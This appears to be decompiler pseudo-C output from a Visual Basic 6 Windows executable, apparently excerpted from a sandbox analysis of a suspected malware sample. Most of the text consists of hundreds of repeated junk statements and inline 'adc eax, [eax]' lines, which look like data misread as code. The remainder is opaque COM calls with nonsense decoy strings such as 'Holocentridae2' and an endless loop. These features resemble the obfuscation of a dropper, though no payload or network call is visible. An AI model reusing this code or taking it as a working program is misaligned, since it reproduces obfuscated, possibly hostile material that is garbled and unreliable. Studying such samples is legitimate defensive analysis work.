				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				_t698 = _t694 - 1 + 1 + _t694 - 1 + 1 -  *((intOrPtr*)(_t694 - 1 + 1 + _t694 - 1 + 1));
				_t1065 = _t622 + 9;
				asm("adc eax, [eax]");
				_t1019 = _t1017;
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t698;
				 *0xc000402c =  *0xc000402c + _t698;
				 *0xc000402c =  *0xc000402c + _t698;
				 *0xc000402c =  *0xc000402c + _t698;
				if( *0xc000402c >= 0) {
					_t698 = _t698 + 1 + _t698 + 1 -  *((intOrPtr*)(_t698 + 1 + _t698 + 1));
					_t1065 = _t1065 + 1;
					asm("adc eax, [eax]");
					_t1019 = _t1019 - 1;
					asm("adc eax, [eax]");
					_push(0xc000402c);
					asm("adc eax, [eax]");
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
					 *0xc000402c =  *0xc000402c + _t698;
				}
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				 *_t698 =  *_t698 + _t698;
				_t702 = _t698 + 1 + _t698 + 1 -  *((intOrPtr*)(_t698 + 1 + _t698 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t702 =  *_t702 + _t702;
				 *_t702 =  *_t702 + _t702;
				 *_t702 =  *_t702 + _t702;
				 *_t702 =  *_t702 + _t702;
				 *_t1046 =  *_t1046 >> 0x40;
				_t704 = _t702 + _t702 -  *((intOrPtr*)(_t702 + _t702));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t704 =  *_t704 + _t704;
				 *_t704 =  *_t704 + _t704;
				 *_t704 =  *_t704 + _t704;
				 *_t704 =  *_t704 + _t704;
				0xc0407477(_t704, _t702);
				_t705 = _t704 -  *_t704;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(_t705);
				asm("adc eax, [eax]");
				 *_t705 =  *_t705 + _t705;
				 *_t705 =  *_t705 + _t705;
				 *_t705 =  *_t705 + _t705;
				 *_t705 =  *_t705 + _t705;
				asm("adc [edi], ch");
				_t708 = _t705 + 1 + _t705 + 1 -  *((intOrPtr*)(_t705 + 1 + _t705 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(_t708);
				asm("adc eax, [eax]");
				 *_t708 =  *_t708 + _t708;
				 *_t708 =  *_t708 + _t708;
				 *_t708 =  *_t708 + _t708;
				 *_t708 =  *_t708 + _t708;
				_t711 = _t708 + 1 + _t708 + 1 -  *((intOrPtr*)(_t708 + 1 + _t708 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(_t711);
				asm("adc eax, [eax]");
				 *_t711 =  *_t711 + _t711;
				 *_t711 =  *_t711 + _t711;
				 *_t711 =  *_t711 + _t711;
				 *_t711 =  *_t711 + _t711;
				asm("pushad");
				asm("das");
				_t714 = _t711 + 1 + _t711 + 1 -  *((intOrPtr*)(_t711 + 1 + _t711 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				 *_t714 =  *_t714 + _t714;
				_t716 = _t1065 + 7;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *_t716 =  *_t716 + _t716;
				 *((intOrPtr*)(_t716 - 0x3fffbfd1)) =  *((intOrPtr*)(_t716 - 0x3fffbfd1)) + _t956;
				_t717 = _t716 -  *_t716;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t717 =  *_t717 + _t717;
				 *_t717 =  *_t717 + _t717;
				 *_t717 =  *_t717 + _t717;
				 *_t717 =  *_t717 + _t717;
				_t721 = 0x60 -  *((intOrPtr*)(0x60));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t721 =  *_t721 + 0x2f;
				 *_t721 =  *_t721 + 0x2f;
				 *_t721 =  *_t721 + 0x2f;
				 *_t721 =  *_t721 + 0x2f;
				asm("fsubr dword [edi]");
				_t724 = _t721 + 1 + _t721 + 1 -  *((intOrPtr*)(_t721 + 1 + _t721 + 1));
				asm("adc eax, [eax]");
				_t1028 = _t1019 - 0xfffffffffffffff9;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t724 =  *_t724 + 0x2f;
				 *_t724 =  *_t724 + 0x2f;
				 *_t724 =  *_t724 + 0x2f;
				 *_t724 =  *_t724 + 0x2f;
				 *_t724 =  *_t724 + _t1028;
				_t727 = _t724 + 1 + _t724 + 1 -  *((intOrPtr*)(_t724 + 1 + _t724 + 1));
				asm("adc eax, [eax]");
				_t1029 = _t1028 - 1;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t727 =  *_t727 + 0x2f;
				 *_t727 =  *_t727 + 0x2f;
				 *_t727 =  *_t727 + 0x2f;
				 *_t727 =  *_t727 + 0x2f;
				 *_t727 =  *_t727 - _t1029;
				_t730 = _t727 + 1 + _t727 + 1 -  *((intOrPtr*)(_t727 + 1 + _t727 + 1));
				asm("adc eax, [eax]");
				_t1030 = _t1029 - 1;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t730 =  *_t730 + 0x2f;
				 *_t730 =  *_t730 + 0x2f;
				 *_t730 =  *_t730 + 0x2f;
				 *_t730 =  *_t730 + 0x2f;
				 *_t730 =  *_t730 ^ 0x0000002f;
				 *_t954 =  *_t954 >> 0x40;
				_t954[_t1030 + 0x40] = _t954[_t1030 + 0x40] + 0x2f;
				 *((intOrPtr*)(_t1030 + 0x13)) =  *((intOrPtr*)(_t1030 + 0x13)) + _t956;
				_t731 =  &(_t730[0]);
				_t731[4] = _t731[4] + _t1030;
				_t732 =  &(_t731[0]);
				 *_t732 =  *_t732 + 0x2f;
				 *_t732 =  *_t732 + 0x2f;
				 *_t732 =  *_t732 + 0x2f;
				 *_t732 =  *_t732 + 0x2f;
				_t732[0xc] =  &(_t954[_t732[0xc]]);
				_t735 =  &(_t732[0]) +  &(_t732[0]) -  *((intOrPtr*)( &(_t732[0]) +  &(_t732[0])));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t735 =  *_t735 + 0x2f;
				 *_t735 =  *_t735 + 0x2f;
				 *_t735 =  *_t735 + 0x2f;
				 *_t735 =  *_t735 + _t735;
				_t737 =  *0xc0004030 -  *((intOrPtr*)( *0xc0004030));
				asm("adc eax, [eax]");
				_t1032 = _t1030;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t737 =  *_t737 + _t737;
				 *_t737 =  *_t737 + _t737;
				 *_t737 =  *_t737 + _t737;
				 *_t737 =  *_t737 + _t737;
				asm("enter 0x4030, 0x0");
				 *_t954 =  *_t954 >> 0x40;
				_t954[_t1032 + 0x40] = _t954[_t1032 + 0x40] + _t737;
				 *((intOrPtr*)(_t1032 + 0x13)) =  *((intOrPtr*)(_t1032 + 0x13)) + _t956;
				_t738 = _t737 + 1;
				 *((intOrPtr*)(_t738 + 0x13)) =  *((intOrPtr*)(_t738 + 0x13)) + _t1032;
				_t739 = _t738 + 1;
				 *_t739 =  *_t739 + _t739;
				 *_t739 =  *_t739 + _t739;
				 *_t739 =  *_t739 + _t739;
				 *_t739 =  *_t739 + _t739;
				_t740 = _t739 + _t1032;
				 *_t740 =  *_t740 ^ _t740;
				 *_t954 =  *_t954 >> 0x40;
				_t954[_t1032 + 0x40] = _t954[_t1032 + 0x40] + _t740;
				 *((intOrPtr*)(_t1032 + 0x13)) =  *((intOrPtr*)(_t1032 + 0x13)) + _t956;
				_t741 = _t740 + 1;
				 *((intOrPtr*)(_t741 + 0x13)) =  *((intOrPtr*)(_t741 + 0x13)) + _t1032;
				_t742 = _t741 + 1;
				 *_t742 =  *_t742 + _t742;
				 *_t742 =  *_t742 + _t742;
				 *_t742 =  *_t742 + _t742;
				 *_t742 =  *_t742 + _t742;
				 *_t742 =  &(_t954[ *_t742]);
				 *_t742 =  *_t742 ^ _t742;
				 *_t954 =  *_t954 >> 0x40;
				_t954[_t1032 + 0x40] = _t954[_t1032 + 0x40] + _t742;
				 *((intOrPtr*)(_t1032 + 0x13)) =  *((intOrPtr*)(_t1032 + 0x13)) + _t956;
				_t743 = _t742 + 1;
				 *((intOrPtr*)(_t743 + 0x13)) =  *((intOrPtr*)(_t743 + 0x13)) + _t1032;
				_t744 = _t743 + 1;
				 *_t744 =  *_t744 + _t744;
				 *_t744 =  *_t744 + _t744;
				 *_t744 =  *_t744 + _t744;
				 *_t744 =  *_t744 + _t744;
				 *((intOrPtr*)(_t744 + 0x31)) =  *((intOrPtr*)(_t744 + 0x31)) + _t744;
				_t747 = _t744 + 1 + _t744 + 1 -  *((intOrPtr*)(_t744 + 1 + _t744 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				_t748 = _t747 -  *_t747;
				_t1081 = _t714 + 9;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				 *_t748 =  *_t748 + _t748;
				 *_t748 =  *_t748 + _t748;
				_v76 = _v76 - 0x83;
				_t1082 = _t1081 - 0xc;
				 *[fs:0x0] = _t1082;
				L004011D0();
				_v96 = _t1082;
				_v92 = 0x401140;
				_v88 = _v76 & 0x00000001;
				_v76 = _v76 & 0xfffffffe;
				 *((intOrPtr*)( *_v76 + 4))(_v76, _t1039, _t1046, _t954,  *[fs:0x0], 0x4011d6, _t1053, _t748, 0xc0004031, _t747, _t737, _t735, _t730, _t730, _t727, _t724, _t721, _t717, _t714);
				if( *0x414010 != 0) {
					_v276 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v276 = 0x414010;
				}
				_t761 =  &_v80;
				L00401332();
				_v216 = _t761;
				_t765 =  *((intOrPtr*)( *_v216 + 0x70))(_v216,  &_v68, _t761,  *((intOrPtr*)( *((intOrPtr*)( *_v276)) + 0x304))( *_v276));
				asm("fclex");
				_v220 = _t765;
				if(_v220 >= 0) {
					_v280 = _v280 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40273c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v280 = _t765;
				}
				_v260 = _v68;
				_v68 = _v68 & 0x00000000;
				_v100 = _v260;
				_v108 = 8;
				_push(0);
				_push( &_v108); // executed
				L00401338(); // executed
				L0040133E();
				L00401320();
				L0040131A();
				if( *0x414010 != 0) {
					_v284 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v284 = 0x414010;
				}
				_t772 =  &_v80;
				L00401332();
				_v216 = _t772;
				_t776 =  *((intOrPtr*)( *_v216 + 0x150))(_v216,  &_v68, _t772,  *((intOrPtr*)( *((intOrPtr*)( *_v284)) + 0x2fc))( *_v284));
				asm("fclex");
				_v220 = _t776;
				if(_v220 >= 0) {
					_v288 = _v288 & 0x00000000;
				} else {
					_push(0x150);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v288 = _t776;
				}
				if( *0x414010 != 0) {
					_v292 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v292 = 0x414010;
				}
				_t780 =  &_v84;
				L00401332();
				_v224 = _t780;
				_t784 =  *((intOrPtr*)( *_v224 + 0x48))(_v224,  &_v72, _t780,  *((intOrPtr*)( *((intOrPtr*)( *_v292)) + 0x300))( *_v292));
				asm("fclex");
				_v228 = _t784;
				if(_v228 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v296 = _t784;
				}
				_v148 = L"Komparenten7";
				_v156 = 8;
				_v264 = _v72;
				_v72 = _v72 & 0x00000000;
				L0040133E();
				_v100 = 0x39d6fa;
				_v108 = 3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t791 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, _v68,  &_v108, 0x1c137100, 0x5afa,  &_v76, 0x10, 0x7922bc);
				_v232 = _t791;
				if(_v232 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402490);
					_push(_a4);
					_push(_v232);
					L00401326();
					_v300 = _t791;
				}
				_push( &_v76);
				_push( &_v68);
				_push(2);
				L00401314();
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L0040130E();
				_t1084 = _t1082 + 0x18;
				L0040131A();
				if( *0x414010 != 0) {
					_v304 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v304 = 0x414010;
				}
				_t799 =  &_v80;
				L00401332();
				_v216 = _t799;
				_t803 =  *((intOrPtr*)( *_v216 + 0x1c0))(_v216,  &_v160, _t799,  *((intOrPtr*)( *((intOrPtr*)( *_v304)) + 0x300))( *_v304));
				asm("fclex");
				_v220 = _t803;
				if(_v220 >= 0) {
					_v308 = _v308 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v308 = _t803;
				}
				if( *0x414010 != 0) {
					_v312 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v312 = 0x414010;
				}
				_t807 =  &_v84;
				L00401332();
				_v224 = _t807;
				_t811 =  *((intOrPtr*)( *_v224 + 0x78))(_v224,  &_v164, _t807,  *((intOrPtr*)( *((intOrPtr*)( *_v312)) + 0x2fc))( *_v312));
				asm("fclex");
				_v228 = _t811;
				if(_v228 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v316 = _t811;
				}
				_v168 = _v164;
				_v132 = _v160;
				_v140 = 3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t818 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x10,  &_v168,  &_v172);
				_v232 = _t818;
				if(_v232 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402490);
					_push(_a4);
					_push(_v232);
					L00401326();
					_v320 = _t818;
				}
				_v32 = _v172;
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L0040130E();
				_t1085 = _t1084 + 0xc;
				if( *0x414010 != 0) {
					_v324 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v324 = 0x414010;
				}
				_t824 =  &_v80;
				L00401332();
				_v216 = _t824;
				_t828 =  *((intOrPtr*)( *_v216 + 0x170))(_v216,  &_v160, _t824,  *((intOrPtr*)( *((intOrPtr*)( *_v324)) + 0x300))( *_v324));
				asm("fclex");
				_v220 = _t828;
				if(_v220 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v328 = _t828;
				}
				if( *0x414010 != 0) {
					_v332 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v332 = 0x414010;
				}
				_t832 =  &_v84;
				L00401332();
				_v224 = _t832;
				_t836 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v164, _t832,  *((intOrPtr*)( *((intOrPtr*)( *_v332)) + 0x304))( *_v332));
				asm("fclex");
				_v228 = _t836;
				if(_v228 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40273c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v336 = _t836;
				}
				if( *0x414010 != 0) {
					_v340 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v340 = 0x414010;
				}
				_t840 =  &_v88;
				L00401332();
				_v232 = _t840;
				_t844 =  *((intOrPtr*)( *_v232 + 0x80))(_v232,  &_v168, _t840,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x300))( *_v340));
				asm("fclex");
				_v236 = _t844;
				if(_v236 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40274c);
					_push(_v232);
					_push(_v236);
					L00401326();
					_v344 = _t844;
				}
				if( *0x414010 != 0) {
					_v348 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v348 = 0x414010;
				}
				_t848 =  &_v92;
				L00401332();
				_v240 = _t848;
				_t852 =  *((intOrPtr*)( *_v240 + 0x78))(_v240,  &_v172, _t848,  *((intOrPtr*)( *((intOrPtr*)( *_v348)) + 0x300))( *_v348));
				asm("fclex");
				_v244 = _t852;
				if(_v244 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40274c);
					_push(_v240);
					_push(_v244);
					L00401326();
					_v352 = _t852;
				}
				_t989 =  &_v68;
				L00401308();
				_v184 = _v172;
				_v180 = 0x81ccb9;
				_v196 =  *0x401138;
				_v100 = _v164;
				_v108 = 3;
				_v132 = L"Diarch4";
				_v140 = 8;
				_v176 = _v160;
				_v360 =  *0x401130;
				_v368 = _v168;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t865 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v176, 0x10,  &_v108,  &_v196,  &_v180, _t989,  &_v184, _t989,  &_v68,  &_v188);
				_v248 = _t865;
				if(_v248 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402490);
					_push(_a4);
					_push(_v248);
					L00401326();
					_v356 = _t865;
				}
				_v36 = _v188;
				L00401302();
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push( &_v80);
				_push(4);
				L0040130E();
				_t1086 = _t1085 + 0x14;
				L0040131A();
				if( *0x414010 != 0) {
					_v360 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v360 = 0x414010;
				}
				_t874 =  &_v80;
				L00401332();
				_v216 = _t874;
				_t878 =  *((intOrPtr*)( *_v216 + 0x60))(_v216,  &_v160, _t874,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x30c))( *_v360));
				asm("fclex");
				_v220 = _t878;
				if(_v220 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40273c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v364 = _t878;
				}
				if( *0x414010 != 0) {
					_v368 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v368 = 0x414010;
				}
				_t882 =  &_v84;
				L00401332();
				_v224 = _t882;
				_t886 =  *((intOrPtr*)( *_v224 + 0x1c0))(_v224,  &_v164, _t882,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x300))( *_v368));
				asm("fclex");
				_v228 = _t886;
				if(_v228 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v372 = _t886;
				}
				if( *0x414010 != 0) {
					_v376 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v376 = 0x414010;
				}
				_t890 =  &_v88;
				L00401332();
				_v232 = _t890;
				_t894 =  *((intOrPtr*)( *_v232 + 0xa0))(_v232,  &_v68, _t890,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x300))( *_v376));
				asm("fclex");
				_v236 = _t894;
				if(_v236 >= 0) {
					_v380 = _v380 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40274c);
					_push(_v232);
					_push(_v236);
					L00401326();
					_v380 = _t894;
				}
				_v116 = 0x6451d2;
				_v124 = 3;
				_v268 = _v68;
				_v68 = _v68 & 0x00000000;
				_v100 = _v268;
				_v108 = 8;
				_v204 = 0xfb4cd7f0;
				_v200 = 0x5af3;
				_v168 = _v160;
				_v132 = 0x4b712a;
				_v140 = 3;
				_v196 =  *0x401128;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t907 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v196, L"Holocentridae2", 0x10, 0x5ac5,  &_v168, _v164,  &_v204, 0x10,  &_v124,  &_v212);
				_v240 = _t907;
				if(_v240 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402490);
					_push(_a4);
					_push(_v240);
					L00401326();
					_v384 = _t907;
				}
				_v44 = _v212;
				_v40 = _v208;
				L0040130E();
				L004012FC();
				_t1088 = _t1086 + 0x1c;
				_t917 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v108,  &_v124, 3,  &_v80,  &_v84,  &_v88);
				asm("fclex");
				_v216 = _t917;
				if(_v216 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x402460);
					_push(_a4);
					_push(_v216);
					L00401326();
					_v388 = _t917;
				}
				while(1) {
					 *((intOrPtr*)( *_a4 + 0x70c))(_a4);
					if( *0x414010 != 0) {
						_v392 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x402bc0);
						L0040132C();
						_v392 = 0x414010;
					}
					_t924 =  &_v80;
					L00401332();
					_v216 = _t924;
					_t928 =  *((intOrPtr*)( *_v216 + 0x60))(_v216,  &_v160, _t924,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x2fc))( *_v392));
					asm("fclex");
					_v220 = _t928;
					if(_v220 >= 0) {
						_v396 = _v396 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40274c);
						_push(_v216);
						_push(_v220);
						L00401326();
						_v396 = _t928;
					}
					if( *0x414010 != 0) {
						_v400 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x402bc0);
						L0040132C();
						_v400 = 0x414010;
					}
					_t932 =  &_v84;
					L00401332();
					_v224 = _t932;
					_t936 =  *((intOrPtr*)( *_v224 + 0xa0))(_v224,  &_v68, _t932,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x2fc))( *_v400));
					asm("fclex");
					_v228 = _t936;
					if(_v228 >= 0) {
						_v404 = _v404 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x40274c);
						_push(_v224);
						_push(_v228);
						L00401326();
						_v404 = _t936;
					}
					_v196 =  *0x401120;
					_t1038 = L"Seksualklinikken9";
					L00401308();
					_v272 = _v68;
					_v68 = _v68 & 0x00000000;
					_v116 = _v272;
					_v124 = 8;
					_v100 = _v160;
					_v108 = 3;
					L004011D0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t1088 =  *0x401118;
					 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v72,  &_v108, 0x10,  &_v72,  &_v196);
					L00401302();
					_push( &_v84);
					_push( &_v80);
					_push(2);
					L0040130E();
					_push( &_v124);
					_t950 =  &_v108;
					_push(_t950);
					_push(2);
					L004012FC();
					_t1088 = _t1088 + 0x18;
					_push(1);
					L004012F0();
					_push(_t1038);
					_push(_t950);
					_push(_v40);
					_push(_v44);
					L004012F6();
					_v44 = _t950;
					_v40 = _t1038;
					_push(_v40);
					_push(_v44);
					L004012EA();
					if(_t950 >= 0) {
						break;
					}
				}
				goto __ebx;
			}

0x00402f88
0x00402f89
0x00402f8b
0x00402f91
0x00402f93
0x00402f96
0x00402f98
0x00402f9a
0x00402f9c
0x00402f9e
0x00402fa0
0x00402fa6
0x00402fb0
0x00402fb1
0x00402fb3
0x00402fba
0x00402fbb
0x00402fbd
0x00402fbf
0x00402fc1
0x00402fc3
0x00402fc5
0x00402fc7
0x00402fcb
0x00402fd1
0x00402fd3
0x00402fd5
0x00402fd7
0x00402fda
